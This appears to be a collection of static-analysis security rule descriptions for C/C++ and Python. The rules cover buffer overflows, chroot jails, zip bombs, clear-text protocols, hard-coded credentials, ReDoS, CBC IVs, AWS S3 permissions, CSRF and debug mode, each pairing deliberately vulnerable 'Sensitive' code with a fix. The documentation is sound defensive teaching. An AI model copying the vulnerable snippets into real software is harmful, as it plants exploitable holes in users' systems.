  • C11 provides, in its annex K, the strcpy_s and the wcscpy_s that were designed as safer alternatives to strcpy and wcscpy. It’s not recommended to use them in all circumstances, because they introduce a runtime overhead and require to write more code for error handling, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions, for example, strlcpy in FreeBSD
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, src); // Sensitive: might overflow
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char *dest = malloc(strlen(src) + 1); // For the final 0
  strcpy(dest, src); // Compliant: we made sure the buffer is large enough
  int r= doSomethingWith(dest);
  free(dest);
  return r;
}

See

cpp:S5802

The purpose of creating a jail, the "virtual root directory" created with chroot-type functions, is to limit access to the file system by isolating the process inside this jail. However, many chroot function implementations don’t modify the current working directory, thus the process has still access to unauthorized resources outside of the "jail".

Ask Yourself Whether

  • The application changes the working directory before or after running chroot.
  • The application uses a path inside the jail directory as working directory.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Change the current working directory to the root directory after switching to a jail directory.

Sensitive Code Example

The current directory is not changed with the chdir function before or after the creation of a jail with the chroot function:

const char* root_dir = "/jail/";
chroot(root_dir); // Sensitive: no chdir before or after chroot, and missing check of return value

The chroot or chdir operations could fail and the process still have access to unauthorized resources. The return code should be checked:

const char* root_dir = "/jail/";
chroot(root_dir); // Sensitive: missing check of the return value
const char* any_dir = "/any/";
chdir(any_dir); // Sensitive: missing check of the return value

Compliant Solution

To correctly isolate the application into a jail, change the current directory with chdir before the chroot and check the return code of both functions:

const char* root_dir = "/jail/";

if (chdir(root_dir) == -1) {
  exit(-1);
}

if (chroot(root_dir) == -1) {  // compliant: the current dir is changed to the jail and the results of both functions are checked
  exit(-1);
}

See

cpp:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data but turned into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers will compress irrelevant data (eg: a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if their number is greater than a predefined threshold, in particular it’s not recommended to recursively expand archives (an entry of an archive could be also an archive).

Sensitive Code Example

#include <archive.h>
#include <archive_entry.h>
// ...

void f(const char *filename, int flags) {
  struct archive_entry *entry;
  struct archive *a = archive_read_new();
  struct archive *ext = archive_write_disk_new();
  archive_write_disk_set_options(ext, flags);
  archive_read_support_format_tar(a);

  if ((archive_read_open_filename(a, filename, 10240))) {
    return;
  }

  for (;;) {
    int r = archive_read_next_header(a, &entry);
    if (r == ARCHIVE_EOF) {
      break;
    }
    if (r != ARCHIVE_OK) {
      return;
    }
  }
  archive_read_close(a);
  archive_read_free(a);

  archive_write_close(ext);
  archive_write_free(ext);
}

Compliant Solution

#include <archive.h>
#include <archive_entry.h>
// ...

int f(const char *filename, int flags) {
  const int max_number_of_extraced_entries = 1000;
  const int64_t max_file_size = 1000000000; // 1 GB

  int number_of_extraced_entries = 0;
  int64_t total_file_size = 0;

  struct archive_entry *entry;
  struct archive *a = archive_read_new();
  struct archive *ext = archive_write_disk_new();
  archive_write_disk_set_options(ext, flags);
  archive_read_support_format_tar(a);
  int status = 0;

  if ((archive_read_open_filename(a, filename, 10240))) {
    return -1;
  }

  for (;;) {
    number_of_extraced_entries++;
    if (number_of_extraced_entries > max_number_of_extraced_entries) {
      status = 1;
      break;
    }

    int r = archive_read_next_header(a, &entry);
    if (r == ARCHIVE_EOF) {
      break;
    }
    if (r != ARCHIVE_OK) {
      status = -1;
      break;
    }

    int file_size = archive_entry_size(entry);
    total_file_size += file_size;
    if (total_file_size > max_file_size) {
      status = 1;
      break;
    }
  }
  archive_read_close(a);
  archive_read_free(a);

  archive_write_close(ext);
  archive_write_free(ext);

  return status;
}

See

cpp:S6069

When using sprintf , it’s up to the developer to make sure the size of the buffer to be written to is large enough to avoid buffer overflows. Buffer overflows can cause the program to crash at a minimum. At worst, a carefully crafted overflow can cause malicious code to be executed.

Ask Yourself Whether

  • if the provided buffer is large enough for the result of any possible call to the sprintf function (including all possible format strings and all possible additional arguments).

There is a risk if you answered no to the above question.

Recommended Secure Coding Practices

There are fundamentally safer alternatives. snprintf is one of them. It takes the size of the buffer as an additional argument, preventing the function from overflowing the buffer.

  • Use snprintf instead of sprintf. The slight performance overhead can be afforded in a vast majority of projects.
  • Check the buffer size passed to snprintf.

If you are working in C++, other safe alternative exist:

  • std::string should be the prefered type to store strings
  • You can format to a string using std::ostringstream
  • Since C++20, std::format is also available to format strings

Sensitive Code Example

sprintf(str, "%s", message);   // Sensitive: `str` buffer size is not checked and it is vulnerable to overflows

Compliant Solution

snprintf(str, sizeof(str), "%s", message); // Prevent overflows by enforcing a maximum size for `str` buffer

Exceptions

It is a very common and acceptable pattern to compute the required size of the buffer with a call to snprintf with the same arguments into an empty buffer (this will fail, but return the necessary size), then to call sprintf as the bound check is not needed anymore. Note that 1 needs to be added by the size reported by snprintf to account for the terminal null character.

size_t buflen = snprintf(0, 0, "%s", message);
char* buf = malloc(buflen + 1); // For the final 0
sprintf(buf, "%s", message);{code}

See

cpp:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

char* http_url = "http://example.com"; // Sensitive
char* ftp_url = "ftp://anonymous@example.com"; // Sensitive
char* telnet_url = "telnet://anonymous@example.com"; // Sensitive
#include <curl/curl.h>

CURL *curl_ftp = curl_easy_init();
curl_easy_setopt(curl_ftp, CURLOPT_URL, "ftp://example.com/"); // Sensitive

CURL *curl_smtp = curl_easy_init();
curl_easy_setopt(curl_smtp, CURLOPT_URL, "smtp://example.com:587"); // Sensitive

Compliant Solution

char* https_url = "https://example.com";
char* sftp_url = "sftp://anonymous@example.com";
char* ssh_url = "ssh://anonymous@example.com";
#include <curl/curl.h>

CURL *curl_ftps = curl_easy_init();
curl_easy_setopt(curl_ftps, CURLOPT_URL, "ftp://example.com/");
curl_easy_setopt(curl_ftps, CURLOPT_USE_SSL, CURLUSESSL_ALL); // FTP transport is done over TLS

CURL *curl_smtp_tls = curl_easy_init();
curl_easy_setopt(curl_smtp_tls, CURLOPT_URL, "smtp://example.com:587");
curl_easy_setopt(curl_smtp_tls, CURLOPT_USE_SSL, CURLUSESSL_ALL); // SMTP with STARTTLS

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

cpp:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule looks for hard-coded credentials in variable names that match any of the patterns from the provided list.

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

dbi_conn conn = dbi_conn_new("mysql");
string password = "secret"; // Sensitive
dbi_conn_set_option(conn, "password", password.c_str());

Compliant Solution

dbi_conn conn = dbi_conn_new("mysql");
string password = getDatabasePassword(); // Compliant
dbi_conn_set_option(conn, "password", password.c_str()); // Compliant

See

cpp:S5798

Why is this an issue?

The compiler is generally allowed to remove code that does not have any effect, according to the abstract machine of the C language. This means that if you have a buffer that contains sensitive data (for instance passwords), calling memset on the buffer before releasing the memory will probably be optimized away.

The function memset_s behaves similarly to memset, but the main difference is that it cannot be optimized away, the memory will be overwritten in all cases. You should always use this function to scrub security-sensitive data.

This rule raises an issue when a call to memset is followed by the destruction of the buffer.

Note that memset_s is defined in annex K of C11, so to have access to it, you need a standard library that supports it (this can be tested with the macro __STDC_LIB_EXT1__), and you need to enable it by defining the macro __STDC_WANT_LIB_EXT1__ before including <string.h>. Other platform specific functions can perform the same operation, for instance SecureZeroMemory (Windows) or explicit_bzero (FreeBSD)

Noncompliant code example

void f(char *password, size_t bufferSize) {
  char localToken[256];
  init(localToken, password);
  memset(password, ' ', strlen(password)); // Noncompliant, password is about to be freed
  memset(localToken, ' ', strlen(localToken)); // Noncompliant, localToken is about to go out of scope
  free(password);
}

Compliant solution

void f(char *password, size_t bufferSize) {
  char localToken[256];
  init(localToken, password);
  memset_s(password, bufferSize, ' ', strlen(password));
  memset_s(localToken, sizeof(localToken), ' ', strlen(localToken));
  free(password);
}

Resources

cpp:S1079

Why is this an issue?

The %s placeholder is used to read a word into a string.

By default, there is no restriction on the length of that word, and the developer is required to pass a sufficiently large buffer for storing it.

No matter how large the buffer is, there will always be a longer word.

Therefore, programs relying on %s are vulnerable to buffer overflows.

A field width specifier can be used together with the %s placeholder to limit the number of bytes which will by written to the buffer.

Note that an additional byte is required to store the null terminator.

Noncompliant code example

char buffer[10];
scanf("%s", buffer);      // Noncompliant - will overflow when a word longer than 9 characters is entered

Compliant solution

char buffer[10];
scanf("%9s", buffer);     // Compliant - will not overflow

Resources

cpp:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas like /tmp in Linux based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

In the past, it has led to the following vulnerabilities:

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see examples bellow). It also detects access to environment variables that point to publicly writable directories, e.g., TMP and TMPDIR.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a dedicated sub-folder with tightly controlled permissions
  • Use secure-by-design APIs to create temporary files. Such API will make sure:
    • The generated filename is unpredictable
    • The file is readable and writable only by the creating user ID
    • The file descriptor is not inherited by child processes
    • The file will be destroyed as soon as it is closed

Sensitive Code Example

#include <cstdio>
// ...

void f() {
  FILE * fp = fopen("/tmp/temporary_file", "r"); // Sensitive
}
#include <cstdio>
#include <cstdlib>
#include <sstream>
// ...

void f() {
  std::stringstream ss;
  ss << getenv("TMPDIR") << "/temporary_file"; // Sensitive
  FILE * fp = fopen(ss.str().c_str(), "w");
}

Compliant Solution

#include <cstdio>
#include <cstdlib>
// ...

void f() {
  FILE * fp = tmpfile(); // Compliant
}

See

cpp:S1081

Why is this an issue?

When using typical C functions, it’s up to the developer to make sure the size of the buffer to be written to is large enough to avoid buffer overflows. Buffer overflows can cause the program to crash at a minimum. At worst, a carefully crafted overflow can cause malicious code to be executed.

This rule reports use of the following insecure functions, for which knowing the required size is not generally possible: gets() and getpw().

In such cases. The only way to prevent buffer overflow while using these functions would be to control the execution context of the application.

It is much safer to secure the application from within and to use an alternate, secure function which allows you to define the maximum number of characters to be written to the buffer:

  • fgets or gets_s
  • getpwuid

Noncompliant code example

gets(str); // Noncompliant; `str` buffer size is not checked and it is vulnerable to overflows

Compliant solution

gets_s(str, sizeof(str)); // Prevent overflows by enforcing a maximum size for `str` buffer

Resources

python:S5852

Most of the regular expression engines use backtracking to try all possible execution paths of the regular expression when evaluating an input, in some cases it can cause performance issues, called catastrophic backtracking situations. In the worst case, the complexity of the regular expression is exponential in the size of the input, this means that a small carefully-crafted input (like 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application. Super-linear regex complexity can lead to the same impact too with, in this case, a large carefully-crafted input (thousands chars).

This rule determines the runtime complexity of a regular expression and informs you of the complexity if it is not linear.

Ask Yourself Whether

  • The input is user-controlled.
  • The input size is not restricted to a small number of characters.
  • There is no timeout in place to limit the regex evaluation time.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

To avoid catastrophic backtracking situations, make sure that none of the following conditions apply to your regular expression.

In all of the following cases, catastrophic backtracking can only happen if the problematic part of the regex is followed by a pattern that can fail, causing the backtracking to actually happen. Note that when performing a full match (e.g. using re.fullmatch), the end of the regex counts as a pattern that can fail because it will only succeed when the end of the string is reached.

  • If you have a non-possessive repetition r* or r*?, such that the regex r could produce different possible matches (of possibly different lengths) on the same input, the worst case matching time can be exponential. This can be the case if r contains optional parts, alternations or additional repetitions (but not if the repetition is written in such a way that there’s only one way to match it).
  • If you have multiple non-possessive repetitions that can match the same contents and are consecutive or are only separated by an optional separator or a separator that can be matched by both of the repetitions, the worst case matching time can be polynomial (O(n^c) where c is the number of problematic repetitions). For example a*b* is not a problem because a* and b* match different things and a*_a* is not a problem because the repetitions are separated by a '_' and can’t match that '_'. However, a*a* and .*_.* have quadratic runtime.
  • If you’re performing a partial match (such as by using re.search, re.split, re.findall etc.) and the regex is not anchored to the beginning of the string, quadratic runtime is especially hard to avoid because whenever a match fails, the regex engine will try again starting at the next index. This means that any unbounded repetition (even a possessive one), if it’s followed by a pattern that can fail, can cause quadratic runtime on some inputs. For example re.split(r"\s*,", my_str) will run in quadratic time on strings that consist entirely of spaces (or at least contain large sequences of spaces, not followed by a comma).

In order to rewrite your regular expression without these patterns, consider the following strategies:

  • If applicable, define a maximum number of expected repetitions using the bounded quantifiers, like {1,5} instead of + for instance.
  • Refactor nested quantifiers to limit the number of way the inner group can be matched by the outer quantifier, for instance this nested quantifier situation (ba+)+ doesn’t cause performance issues, indeed, the inner group can be matched only if there exists exactly one b char per repetition of the group.
  • Optimize regular expressions with possessive quantifiers and atomic grouping (available since Python 3.11).
  • Use negated character classes instead of . to exclude separators where applicable. For example the quadratic regex .*_.* can be made linear by changing it to [^_]*_.*

Sometimes it’s not possible to rewrite the regex to be linear while still matching what you want it to match. Especially when using partial matches, for which it is quite hard to avoid quadratic runtimes. In those cases consider the following approaches:

  • Solve the problem without regular expressions
  • Use an alternative non-backtracking regex implementations such as Google’s RE2.
  • Use multiple passes. This could mean pre- and/or post-processing the string manually before/after applying the regular expression to it or using multiple regular expressions. One example of this would be to replace re.split("\s*,\s*", my_str) with re.split(",", my_str) and then trimming the spaces from the strings as a second step.

See

python:S6265

Predefined permissions, also known as canned ACLs, are an easy way to grant large privileges to predefined groups or users.

The following canned ACLs are security-sensitive:

  • PUBLIC_READ, PUBLIC_READ_WRITE grant respectively "read" and "read and write" privileges to everyone in the world (AllUsers group).
  • AUTHENTICATED_READ grants "read" privilege to all authenticated users (AuthenticatedUsers group).

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege policy, i.e., to grant necessary permissions only to users for their required tasks. In the context of canned ACL, set it to PRIVATE (the default one), and if needed more granularity then use an appropriate S3 policy.

Sensitive Code Example

All users (ie: anyone in the world authenticated or not) have read and write permissions with the PUBLIC_READ_WRITE access control:

bucket = s3.Bucket(self, "bucket",
    access_control=s3.BucketAccessControl.PUBLIC_READ_WRITE     # Sensitive
)

s3deploy.BucketDeployment(self, "DeployWebsite",
    access_control=s3.BucketAccessControl.PUBLIC_READ_WRITE     # Sensitive
)

Compliant Solution

With the PRIVATE access control (default), only the bucket owner has the read/write permissions on the buckets and its ACL.

bucket = s3.Bucket(self, "bucket",
    access_control=s3.BucketAccessControl.PRIVATE       # Compliant
)

# Another example
s3deploy.BucketDeployment(self, "DeployWebsite",
    access_control=s3.BucketAccessControl.PRIVATE       # Compliant
)

See

python:S2115

Why is this an issue?

When relying on the password authentication mode for the database connection, a secure password should be chosen.

This rule raises an issue when an empty password is used.

Noncompliant code example

Flask-SQLAlchemy

def configure_app(app):
    app.config['SQLALCHEMY_DATABASE_URI'] = "postgresql://user:@domain.com" # Noncompliant

Django

# settings.py

DATABASES = {
    'postgresql_db': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': 'quickdb',
        'USER': 'sonarsource',
        'PASSWORD': '', # Noncompliant
        'HOST': 'localhost',
        'PORT': '5432'
    }
}

mysql/mysql-connector-python

from mysql.connector import connection

connection.MySQLConnection(host='localhost', user='sonarsource', password='')  # Noncompliant

Compliant solution

Flask-SQLAlchemy

def configure_app(app, pwd):
    app.config['SQLALCHEMY_DATABASE_URI'] = f"postgresql://user:{pwd}@domain.com" # Compliant

Django

# settings.py
import os

DATABASES = {
    'postgresql_db': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': 'quickdb',
        'USER': 'sonarsource',
        'PASSWORD': os.getenv('DB_PASSWORD'),      # Compliant
        'HOST': 'localhost',
        'PORT': '5432'
    }
}

mysql/mysql-connector-python

from mysql.connector import connection
import os

db_password = os.getenv('DB_PASSWORD')
connection.MySQLConnection(host='localhost', user='sonarsource', password=db_password)  # Compliant

Resources

python:S3329

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In the mode Cipher Block Chaining (CBC), each block is used as cryptographic input for the next block. For this reason, the first block requires an initialization vector (IV), also called a "starting variable" (SV).

If the same IV is used for multiple encryption sessions or messages, each new encryption of the same plaintext input would always produce the same ciphertext output. This may allow an attacker to detect patterns in the ciphertext.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, a company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in pyca

Code examples

Noncompliant code example

from cryptography.hazmat.primitives.ciphers import (
    Cipher,
    algorithms,
    modes,
)

iv     = "doNotTryThis@Home2023"
cipher = Cipher(algorithms.AES(key), modes.CBC(iv))

cipher.encryptor()  # Noncompliant

Compliant solution

In this example, the code explicitly uses a number generator that is considered strong.

from os import urandom

from cryptography.hazmat.primitives.ciphers import (
    Cipher,
    algorithms,
    modes,
)

iv     = urandom(16)
cipher = Cipher(algorithms.AES(key), modes.CBC(iv))

cipher.encryptor()

How does this work?

Use unique IVs

To ensure strong security, the initialization vectors for each encryption operation must be unique and random but they do not have to be secret.

In the previous non-compliant example, the problem is not that the IV is hard-coded.
It is that the same IV is used for multiple encryption attempts.

Resources

Standards

python:S6275

Amazon Elastic Block Store (EBS) is a block-storage service for Amazon Elastic Compute Cloud (EC2). EBS volumes can be encrypted, ensuring the security of both data-at-rest and data-in-transit between an instance and its attached EBS storage. In the case that adversaries gain physical access to the storage medium they are not able to access the data. Encryption can be enabled for specific volumes or for all new volumes and snapshots. Volumes created from snapshots inherit their encryption configuration. A volume created from an encrypted snapshot will also be encrypted by default.

Ask Yourself Whether

  • The disk contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EBS volumes that contain sensitive information. Encryption and decryption are handled transparently by EC2, so no further modifications to the application are necessary. Instead of enabling encryption for every volume, it is also possible to enable encryption globally for a specific region. While creating volumes from encrypted snapshots will result in them being encrypted, explicitly enabling this security parameter will prevent any future unexpected security downgrade.

Sensitive Code Example

For aws_cdk.aws_ec2.Volume:

from aws_cdk.aws_ec2 import Volume

class EBSVolumeStack(Stack):

    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        Volume(self,
            "unencrypted-explicit",
            availability_zone="eu-west-1a",
            size=Size.gibibytes(1),
            encrypted=False  # Sensitive
        )
from aws_cdk.aws_ec2 import Volume

class EBSVolumeStack(Stack):

    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        Volume(self,
            "unencrypted-implicit",
            availability_zone="eu-west-1a",
            size=Size.gibibytes(1)
        ) # Sensitive as encryption is disabled by default

Compliant Solution

For aws_cdk.aws_ec2.Volume:

from aws_cdk.aws_ec2 import Volume

class EBSVolumeStack(Stack):

    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        Volume(self,
            "encrypted-explicit",
            availability_zone="eu-west-1a",
            size=Size.gibibytes(1),
            encrypted=True
        )

See

python:S6270

Resource-based policies granting access to all users can lead to information leakage.

Ask Yourself Whether

  • The AWS resource stores or processes sensitive data.
  • The AWS resource is designed to be private.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege principle, i.e. to grant necessary permissions only to users for their required tasks. In the context of resource-based policies, list the principals that need the access and grant to them only the required privileges.

Sensitive Code Example

This policy allows all users, including anonymous ones, to access an S3 bucket:

from aws_cdk.aws_iam import PolicyStatement, AnyPrincipal, Effect
from aws_cdk.aws_s3 import Bucket

bucket = Bucket(self, "ExampleBucket")

bucket.add_to_resource_policy(PolicyStatement(
  effect=Effect.ALLOW,
  actions=["s3:*"],
  resources=[bucket.arn_for_objects("*")],
  principals=[AnyPrincipal()] # Sensitive
))

Compliant Solution

This policy allows only the authorized users:

from aws_cdk.aws_iam import PolicyStatement, AccountRootPrincipal, Effect
from aws_cdk.aws_s3 import Bucket

bucket = Bucket(self, "ExampleBucket")

bucket.add_to_resource_policy(PolicyStatement(
  effect=Effect.ALLOW,
  actions=["s3:*"],
  resources=[bucket.arn_for_objects("*")],
  principals=[AccountRootPrincipal()]
))

See

python:S4502

A cross-site request forgery (CSRF) attack occurs when a trusted user of a web application can be forced, by an attacker, to perform sensitive actions that he didn’t intend, such as updating his profile or sending a message, more generally anything that can change the state of the application.

The attacker can trick the user/victim to click on a link, corresponding to the privileged action, or to visit a malicious web site that embeds a hidden web request and as web browsers automatically include cookies, the actions can be authenticated and sensitive.

Ask Yourself Whether

  • The web application uses cookies to authenticate users.
  • There exist sensitive operations in the web application that can be performed when the user is authenticated.
  • The state / resources of the web application can be modified by doing HTTP POST or HTTP DELETE requests for example.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Protection against CSRF attacks is strongly recommended:
    • to be activated by default for all unsafe HTTP methods.
    • implemented, for example, with an unguessable CSRF token
  • Of course all sensitive operations should not be performed with safe HTTP methods like GET which are designed to be used only for information retrieval.

Sensitive Code Example

For a Django application, the code is sensitive when,

  • django.middleware.csrf.CsrfViewMiddleware is not used in the Django settings:
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
] # Sensitive: django.middleware.csrf.CsrfViewMiddleware is missing
  • the CSRF protection is disabled on a view:
@csrf_exempt # Sensitive
def example(request):
    return HttpResponse("default")

For a Flask application, the code is sensitive when,

  • the WTF_CSRF_ENABLED setting is set to false:
app = Flask(__name__)
app.config['WTF_CSRF_ENABLED'] = False # Sensitive
  • the application doesn’t use the CSRFProtect module:
app = Flask(__name__) # Sensitive: CSRFProtect is missing

@app.route('/')
def hello_world():
    return 'Hello, World!'
  • the CSRF protection is disabled on a view:
app = Flask(__name__)
csrf = CSRFProtect()
csrf.init_app(app)

@app.route('/example/', methods=['POST'])
@csrf.exempt # Sensitive
def example():
    return 'example '
  • the CSRF protection is disabled on a form:
class unprotectedForm(FlaskForm):
    class Meta:
        csrf = False # Sensitive

    name = TextField('name')
    submit = SubmitField('submit')

Compliant Solution

For a Django application,

  • it is recommended to protect all the views with django.middleware.csrf.CsrfViewMiddleware:
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware', # Compliant
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
  • and to not disable the CSRF protection on specific views:
def example(request): # Compliant
    return HttpResponse("default")

For a Flask application,

  • the CSRFProtect module should be used (and not disabled further with WTF_CSRF_ENABLED set to false):
app = Flask(__name__)
csrf = CSRFProtect()
csrf.init_app(app) # Compliant
  • and it is recommended to not disable the CSRF protection on specific views or forms:
@app.route('/example/', methods=['POST']) # Compliant
def example():
    return 'example '

class unprotectedForm(FlaskForm):
    class Meta:
        csrf = True # Compliant

    name = TextField('name')
    submit = SubmitField('submit')

See

python:S6245

Server-side encryption (SSE) encrypts an object (not the metadata) as it is written to disk (where the S3 bucket resides) and decrypts it as it is read from disk. This doesn’t change the way the objects are accessed, as long as the user has the necessary permissions, objects are retrieved as if they were unencrypted. Thus, SSE only helps in the event of disk thefts, improper disposals of disks and other attacks on the AWS infrastructure itself.

There are three SSE options:

  • Server-Side Encryption with Amazon S3-Managed Keys (SSE-S3)
    • AWS manages encryption keys and the encryption itself (with AES-256) on its own.
  • Server-Side Encryption with Customer Master Keys (CMKs) Stored in AWS Key Management Service (SSE-KMS)
    • AWS manages the encryption (AES-256) of objects and encryption keys provided by the AWS KMS service.
  • Server-Side Encryption with Customer-Provided Keys (SSE-C)
    • AWS manages only the encryption (AES-256) of objects with encryption keys provided by the customer. AWS doesn’t store the customer’s encryption keys.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure needs to comply to some regulations, like HIPAA or PCI DSS, and other standards.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to use SSE. Choosing the appropriate option depends on the level of control required for the management of encryption keys.

Sensitive Code Example

Server-side encryption is not used:

bucket = s3.Bucket(self,"bucket",
    encryption=s3.BucketEncryption.UNENCRYPTED       # Sensitive
)

The default value of encryption is KMS if encryptionKey is set. Otherwise, if both parameters are absent the bucket is unencrypted.

Compliant Solution

Server-side encryption with Amazon S3-Managed Keys is used:

bucket = s3.Bucket(self,"bucket",
    encryption=s3.BucketEncryption.S3_MANAGED
)

# Alternatively with a KMS key managed by the user.

bucket = s3.Bucket(self,"bucket",
    encryptionKey=access_key
)

See

python:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers or applications distributed to end users.

Sensitive Code Example

from django.conf import settings

settings.configure(DEBUG=True)  # Sensitive when set to True
